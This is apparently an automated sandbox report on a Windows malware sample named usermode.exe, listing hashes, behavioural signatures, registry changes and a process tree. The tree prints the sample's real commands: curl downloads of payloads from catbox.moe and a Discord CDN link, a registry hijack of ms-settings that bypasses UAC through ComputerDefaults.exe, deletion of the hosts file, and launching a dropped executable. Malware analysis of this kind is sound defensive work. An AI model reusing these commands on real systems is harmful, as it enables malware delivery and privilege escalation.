Analysis
-
max time kernel
20s -
max time network
22s -
platform
windows11-21h2_x64 -
resource
win11-20241007-en -
resource tags
arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system -
submitted
30/10/2024, 13:56
Behavioral task
behavioral1
Sample
usermode.exe
Resource
win11-20241007-en
General
-
Target
usermode.exe
-
Size
5.4MB
-
MD5
fb4bf2834546449c2ce7593c9b152995
-
SHA1
962351902ca2b130d5652e6b42bc7c5fdf8ab4d4
-
SHA256
f63734e8c099081fb6f7386aaa960667e297a0b323d7b583d1a2cfcd974353dd
-
SHA512
275d02f4871707f7b57b348f0a882abf98b3746bd7c5da80180d6b4a0cf67415ae0d3992b4b410235054f57c0a5c81216fd4a572d0a8e8059d2fe154fa72d2a8
-
SSDEEP
98304:ApRYuEKLOdpy9owo8DQZpvSnHHQoCZ06i8ATTkPb7UzVC2wx7ETxZ:AsWOdpy9oX8oZti8UTmb7f2wx7El
Malware Config
Signatures
-
Downloads MZ/PE file
-
Executes dropped EXE 2 IoCs
pid Process 3400 secret.exe 3052 uBXGGIIoaOA3aw5m7pLMX006.exe -
resource yara_rule behavioral1/memory/3908-2-0x00007FF7BA160000-0x00007FF7BAA79000-memory.dmp vmprotect behavioral1/memory/3908-5-0x00007FF7BA160000-0x00007FF7BAA79000-memory.dmp vmprotect behavioral1/memory/3908-15-0x00007FF7BA160000-0x00007FF7BAA79000-memory.dmp vmprotect -
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 1 raw.githubusercontent.com 8 raw.githubusercontent.com -
Drops file in System32 directory 1 IoCs
description ioc Process File created C:\Windows\System32\secret.exe curl.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 22 IoCs
description ioc Process Key deleted \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings reg.exe Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings\Shell\Open\command reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings\Shell\Open\command\ = "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\168587.vbs" reg.exe Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings\Shell\Open\command reg.exe Key deleted \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings\Shell\Open\command reg.exe Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings\Shell\Open reg.exe Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings\Shell\Open\command reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings\Shell\Open\command\DelegateExecute reg.exe Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings reg.exe Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings\Shell\Open reg.exe Key deleted \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings\Shell reg.exe Key deleted \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings reg.exe Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings reg.exe Key deleted \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings\Shell\Open reg.exe Key deleted \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings\Shell reg.exe Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings\Shell reg.exe Key deleted \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings\Shell\Open reg.exe Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings\Shell reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings\Shell\Open\command\ = "wscript.exe C:\\Users\\Admin\\AppData\\Local\\Temp\\542700.vbs" reg.exe Key deleted \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings\Shell\Open\command reg.exe Key created \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings\Shell\Open\command reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2499603254-3415597248-1508446358-1000_Classes\ms-settings\Shell\Open\command\DelegateExecute reg.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 3908 usermode.exe 3908 usermode.exe -
Suspicious use of WriteProcessMemory 62 IoCs
description pid Process procid_target PID 3908 wrote to memory of 4292 3908 usermode.exe 78 PID 3908 wrote to memory of 4292 3908 usermode.exe 78 PID 4292 wrote to memory of 2192 4292 cmd.exe 79 PID 4292 wrote to memory of 2192 4292 cmd.exe 79 PID 3908 wrote to memory of 3376 3908 usermode.exe 80 PID 3908 wrote to memory of 3376 3908 usermode.exe 80 PID 3376 wrote to memory of 3400 3376 cmd.exe 81 PID 3376 wrote to memory of 3400 3376 cmd.exe 81 PID 3400 wrote to memory of 3740 3400 secret.exe 82 PID 3400 wrote to memory of 3740 3400 secret.exe 82 PID 3740 wrote to memory of 3836 3740 cmd.exe 84 PID 3740 wrote to memory of 3836 3740 cmd.exe 84 PID 3400 wrote to memory of 2608 3400 secret.exe 85 PID 3400 wrote to memory of 2608 3400 secret.exe 85 PID 2608 wrote to memory of 3788 2608 cmd.exe 87 PID 2608 wrote to memory of 3788 2608 cmd.exe 87 PID 2608 wrote to memory of 2932 2608 cmd.exe 88 PID 2608 wrote to memory of 2932 2608 cmd.exe 88 PID 3400 wrote to memory of 4512 3400 secret.exe 89 PID 3400 wrote to memory of 4512 3400 secret.exe 89 PID 4512 wrote to memory of 3756 4512 cmd.exe 91 PID 4512 wrote to memory of 3756 4512 cmd.exe 91 PID 3756 wrote to memory of 436 3756 ComputerDefaults.exe 92 PID 3756 wrote to memory of 436 3756 ComputerDefaults.exe 92 PID 436 wrote to memory of 1448 436 wscript.exe 93 PID 436 wrote to memory of 1448 436 wscript.exe 93 PID 3400 wrote to memory of 1104 3400 secret.exe 95 PID 3400 wrote to memory of 1104 3400 secret.exe 95 PID 3400 wrote to memory of 1688 3400 secret.exe 97 PID 3400 wrote to memory of 1688 3400 secret.exe 97 PID 1688 wrote to memory of 4816 1688 cmd.exe 99 PID 1688 wrote to memory of 4816 1688 cmd.exe 99 PID 3400 wrote to memory of 1240 3400 secret.exe 100 PID 3400 wrote to memory of 1240 3400 secret.exe 100 PID 1240 wrote to memory of 4508 1240 cmd.exe 102 PID 1240 wrote to memory of 4508 1240 cmd.exe 102 PID 3400 wrote to memory of 2144 3400 secret.exe 103 PID 3400 wrote to memory of 2144 3400 secret.exe 103 PID 2144 wrote to memory of 4036 2144 cmd.exe 105 PID 2144 wrote to memory of 4036 2144 cmd.exe 105 PID 2144 wrote to memory of 2584 2144 cmd.exe 106 PID 2144 wrote to memory of 2584 2144 cmd.exe 106 PID 3400 wrote to memory of 3388 3400 secret.exe 107 PID 3400 wrote to memory of 3388 3400 secret.exe 107 PID 3388 wrote to memory of 892 3388 cmd.exe 109 PID 3388 wrote to memory of 892 3388 cmd.exe 109 PID 892 wrote to memory of 392 892 ComputerDefaults.exe 110 PID 892 wrote to memory of 392 892 ComputerDefaults.exe 110 PID 392 wrote to memory of 1524 392 wscript.exe 111 PID 392 wrote to memory of 1524 392 wscript.exe 111 PID 1524 wrote to memory of 3052 1524 cmd.exe 113 PID 1524 wrote to memory of 3052 1524 cmd.exe 113 PID 3400 wrote to memory of 1468 3400 secret.exe 114 PID 3400 wrote to memory of 1468 3400 secret.exe 114 PID 3400 wrote to memory of 2004 3400 secret.exe 119 PID 3400 wrote to memory of 2004 3400 secret.exe 119 PID 2004 wrote to memory of 2136 2004 cmd.exe 121 PID 2004 wrote to memory of 2136 2004 cmd.exe 121 PID 3908 wrote to memory of 1948 3908 usermode.exe 122 PID 3908 wrote to memory of 1948 3908 usermode.exe 122 PID 1948 wrote to memory of 1488 1948 cmd.exe 123 PID 1948 wrote to memory of 1488 1948 cmd.exe 123
Processes
-
C:\Users\Admin\AppData\Local\Temp\usermode.exe"C:\Users\Admin\AppData\Local\Temp\usermode.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3908 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c curl "https://files.catbox.moe/zalgwe.bin" --output "C:\Windows\System32\secret.exe" >nul 2>&12⤵
- Suspicious use of WriteProcessMemory
PID:4292 -
C:\Windows\system32\curl.execurl "https://files.catbox.moe/zalgwe.bin" --output "C:\Windows\System32\secret.exe"3⤵
- Drops file in System32 directory
PID:2192
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\secret.exe2⤵
- Suspicious use of WriteProcessMemory
PID:3376 -
C:\Windows\System32\secret.exeC:\Windows\System32\secret.exe3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3400 -
C:\Windows\system32\cmd.exe/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f4⤵
- Suspicious use of WriteProcessMemory
PID:3740 -
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f5⤵PID:3836
-
-
-
C:\Windows\system32\cmd.exe/c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\542700.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f4⤵
- Suspicious use of WriteProcessMemory
PID:2608 -
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\542700.vbs" /f5⤵
- Modifies registry class
PID:3788
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f5⤵
- Modifies registry class
PID:2932
-
-
-
C:\Windows\system32\cmd.exe/c start /B ComputerDefaults.exe4⤵
- Suspicious use of WriteProcessMemory
PID:4512 -
C:\Windows\system32\ComputerDefaults.exeComputerDefaults.exe5⤵
- Suspicious use of WriteProcessMemory
PID:3756 -
C:\Windows\system32\wscript.exe"wscript.exe" C:\Users\Admin\AppData\Local\Temp\542700.vbs6⤵
- Suspicious use of WriteProcessMemory
PID:436 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C del C:\Windows\System32\drivers\etc\hosts7⤵PID:1448
-
-
-
-
-
C:\Windows\system32\cmd.exe/c del /f C:\Users\Admin\AppData\Local\Temp\542700.vbs4⤵PID:1104
-
-
C:\Windows\system32\cmd.exe/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f4⤵
- Suspicious use of WriteProcessMemory
PID:1688 -
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f5⤵
- Modifies registry class
PID:4816
-
-
-
C:\Windows\system32\cmd.exe/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f4⤵
- Suspicious use of WriteProcessMemory
PID:1240 -
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f5⤵PID:4508
-
-
-
C:\Windows\system32\cmd.exe/c reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\168587.vbs" /f & reg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f4⤵
- Suspicious use of WriteProcessMemory
PID:2144 -
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /ve /t REG_SZ /d "wscript.exe C:\Users\Admin\AppData\Local\Temp\168587.vbs" /f5⤵
- Modifies registry class
PID:4036
-
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command" /v DelegateExecute /t REG_SZ /d "" /f5⤵
- Modifies registry class
PID:2584
-
-
-
C:\Windows\system32\cmd.exe/c start /B ComputerDefaults.exe4⤵
- Suspicious use of WriteProcessMemory
PID:3388 -
C:\Windows\system32\ComputerDefaults.exeComputerDefaults.exe5⤵
- Suspicious use of WriteProcessMemory
PID:892 -
C:\Windows\system32\wscript.exe"wscript.exe" C:\Users\Admin\AppData\Local\Temp\168587.vbs6⤵
- Suspicious use of WriteProcessMemory
PID:392 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C start C:\Users\Admin\AppData\Local\Microsoft\Windows\Ringtones\uBXGGIIoaOA3aw5m7pLMX006.exe jwah3vi8udplil4pnbtk5lm9cw9p1w:uBXGGIIoaOA3aw5m7pLMX006:matchashop.icu7⤵
- Suspicious use of WriteProcessMemory
PID:1524 -
C:\Users\Admin\AppData\Local\Microsoft\Windows\Ringtones\uBXGGIIoaOA3aw5m7pLMX006.exeC:\Users\Admin\AppData\Local\Microsoft\Windows\Ringtones\uBXGGIIoaOA3aw5m7pLMX006.exe jwah3vi8udplil4pnbtk5lm9cw9p1w:uBXGGIIoaOA3aw5m7pLMX006:matchashop.icu8⤵
- Executes dropped EXE
PID:3052
-
-
-
-
-
-
C:\Windows\system32\cmd.exe/c del /f C:\Users\Admin\AppData\Local\Temp\168587.vbs4⤵PID:1468
-
-
C:\Windows\system32\cmd.exe/c reg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f4⤵
- Suspicious use of WriteProcessMemory
PID:2004 -
C:\Windows\system32\reg.exereg delete "HKEY_CURRENT_USER\Software\Classes\ms-settings" /f5⤵
- Modifies registry class
PID:2136
-
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c curl "https://cdn.discordapp.com/attachments/1263645426599596164/1293915367185580053/dukedennis.otf?ex=67091c17&is=6707ca97&hm=681743a411446d1716303f04ab6b576ca7b42f46779ab825121f40f4a198b70a" --output "C:\dukedennis.otf" >nul 2>&12⤵
- Suspicious use of WriteProcessMemory
PID:1948 -
C:\Windows\system32\curl.execurl "https://cdn.discordapp.com/attachments/1263645426599596164/1293915367185580053/dukedennis.otf?ex=67091c17&is=6707ca97&hm=681743a411446d1716303f04ab6b576ca7b42f46779ab825121f40f4a198b70a" --output "C:\dukedennis.otf"3⤵PID:1488
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD567e486b2f148a3fca863728242b6273e
SHA1452a84c183d7ea5b7c015b597e94af8eef66d44a
SHA256facaf1c3a4bf232abce19a2d534e495b0d3adc7dbe3797d336249aa6f70adcfb
SHA512d3a37da3bb10a9736dc03e8b2b49baceef5d73c026e2077b8ebc1b786f2c9b2f807e0aa13a5866cf3b3cafd2bc506242ef139c423eaffb050bbb87773e53881e
-
Filesize
436B
MD5971c514f84bba0785f80aa1c23edfd79
SHA1732acea710a87530c6b08ecdf32a110d254a54c8
SHA256f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895
SHA51243dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12
Filesize174B
MD53bf53b7cb0ef14526332140e3f06e30e
SHA173684a2e322f714d3cf7396cc467f4b2fbe48c60
SHA25663d7227e22957e115ece214bf46e427d95782e2ed7c5be04b43bad30a50d9014
SHA51282728bb630791419f845e5a1a9a67b210fb4065f9603616aca1d9446d080028a0a64bed10d5e405f453e32fbf5d31fb020a9ec38ba9ca01e843c97fe437c3eee
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8
Filesize170B
MD5bd34d3e89ca124297388a6e74ba69449
SHA154742685dfa4f520e2e93b2024629c91c925ccfb
SHA2564173a607877121ad103b1018726634f0d28bf6ca7ac86be683f162a6abbacd7b
SHA512700573da5a8fb38ee6fc9f92b45f33d2d2a0ac6610eb572ef0cb164c686164d5dbdf07e1012606f57cad64102b00fc443fa9c1031d517d0d7c9cf5ab8593eb2d
-
Filesize
2.7MB
MD5925efe96cdd4c38990ce77cf97f5218f
SHA16deeb34ba43549ac8a7d6b545257e6df64e29495
SHA256c0f88af9fb0d75921f09ead45882adb82a2b1222d728de0f10ae8a875ee757a4
SHA5123d7a24dea82a9908ed599680dbe1caeadbee5cb04aa06a4c6310ceccd8f98f8ca9f0666434d48945e44ec48c3f4ef21d3c23df4252b4d5792995a4b1892014d3
-
Filesize
246B
MD50b4570ab9e0b9b3a1c729d2dfe4269cf
SHA1d8f47021a2000ec2160cfceeb59654d28d3b7ba4
SHA256d4aec27b2377d3267c10348eaacfaa97dbb2ca0c3f0f5170d905301a77ae0f9d
SHA5120adf851c389281cbd1c28a6ac08691179dec2a536f1d68ce46a621e5d234dbb5cd826aaea2193a674e1396fdaa745f21fba9988cb2cb19736d0c153f3b86422e
-
Filesize
125B
MD58b4ed5c47fdddbeba260ef11cfca88c6
SHA1868f11f8ed78ebe871f9da182d053f349834b017
SHA256170226b93ac03ac3178c0429577626add00665e1d71be650a4c46674f6e262a5
SHA51287e5bcaa143e616c365557f5af73e131a10eb380016633b8c7e38c83b0a216a8f6768cfa0166fad208d47830808444517e57d07d850ff2bd575ca67bad9eabdf
-
Filesize
228KB
MD568487b48506703ac72bf48e57a5f6ffa
SHA17eb5a51f8ecead1e555d79db58bb43e61264b51b
SHA256f3ecc9924b3a625fcc54d59008706e41c830c6952bf836e77352a340251c8cae
SHA512033f745e1c289ad4cd69b1494962fd6260484cb300c7556d76635908dbc5f54e626b5c21e130058c5d84b5978eff3628dd6fd8b56e35bf37c0a6f866ffb8cbb0